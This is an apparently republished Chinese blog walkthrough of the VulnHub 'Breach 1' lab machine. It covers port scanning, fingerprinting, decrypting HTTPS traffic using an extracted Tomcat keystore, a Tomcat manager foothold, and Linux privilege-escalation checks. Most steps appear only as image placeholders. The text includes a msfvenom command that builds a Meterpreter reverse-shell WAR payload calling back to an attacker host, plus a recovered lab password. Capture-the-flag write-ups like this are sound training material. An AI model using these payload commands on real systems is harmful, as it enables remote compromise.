反弹连接vulnhub靶场breach1

靶场环境

https://www.vulnhub.com/

配置靶机网络

在这里插入图片描述

在这里插入图片描述在这里插入图片描述

工具准备

准备一个kali
在这里插入图片描述burpsuite
wireshark
CTF编码工具
kali反弹 192.168.110.128
breach1 192.168.110.140
kali攻击 192.168.202.129
在这里插入图片描述

端口扫描信息收集

nmap -T4 -A -v 192.168.110.140
在这里插入图片描述在这里插入图片描述得到这么多端口,猜测可能是添加了一些安全产品

思路:按照常用的端口为80,打开网站看看

在这里插入图片描述
思路:翻译看看
在这里插入图片描述

思路:保存图片到本地,打开stu.baidu.com查看这张图的来源
在这里插入图片描述
在这里插入图片描述思路:查看一下源码
在这里插入图片描述
思路:想想编码的特征
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述思路:猜测这个很可能是用户名和密码

看到鼠标一接近那个图片就会变成手的形状,可以点点看
在这里插入图片描述

在这里插入图片描述

思路:使用目录扫描dirb
在这里插入图片描述没有什么发现

指纹识别

  • Wappalyzer安装插件
    在这里插入图片描述
    在这里插入图片描述
  • whatweb

在这里插入图片描述

  • msf

在这里插入图片描述
在这里插入图片描述全部尝试一下,发现都不成功

CMS后台信息收集

在这里插入图片描述在这里插入图片描述
在这里插入图片描述在这里插入图片描述
在这里插入图片描述在这里插入图片描述
在这里插入图片描述

这是一个密钥库的文件

在这里插入图片描述

解密HTTPS流量

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述HTTP的端口为8443

在这里插入图片描述
在这里插入图片描述
补充:使用keytool.exe生成一个密钥库
在这里插入图片描述查看密钥库的内容
在这里插入图片描述生成证书
在这里插入图片描述

提取证书
keytool -importkeystore -srckeystore D:\vulnhub\2-breach1\keystore -destkeystore D:\vulnhub\2-breach1\tomcat.p12 -deststoretype PKCS12 -srcalias tomcat
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

新版本为TLS
在这里插入图片描述

在这里插入图片描述
过滤查看一下数据包
ip.src ==192.168.110.140 || ip.dst == 192.168.110.140 and http

在这里插入图片描述在这里插入图片描述

在这里插入图片描述

获取的证书是不安全,服务器不接受
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

Tomcat后台利用

利用Kali-129生成木马
在这里插入图片描述

msfvenom -p java/meterpreter/reverse_tcp lhost=192.168.110.128 lport=4444 -f war -o kali.war

在这里插入图片描述在这里插入图片描述
在这里插入图片描述
点击/kali
迅速放包
在这里插入图片描述在这里插入图片描述在这里插入图片描述

Linux提权

在这里插入图片描述

1,搜索漏洞
2,find ; ls -a
3,history
4,sudo -l
5,uname -a
在这里插入图片描述在这里插入图片描述在这里插入图片描述
在这里插入图片描述在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述没有什么,乖乖的从头开始
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

在这里插入图片描述
尝试登录

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
密码为coffeestains

在这里插入图片描述在这里插入图片描述

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

猜你喜欢

转载自blog.csdn.net/m0_57379855/article/details/123405003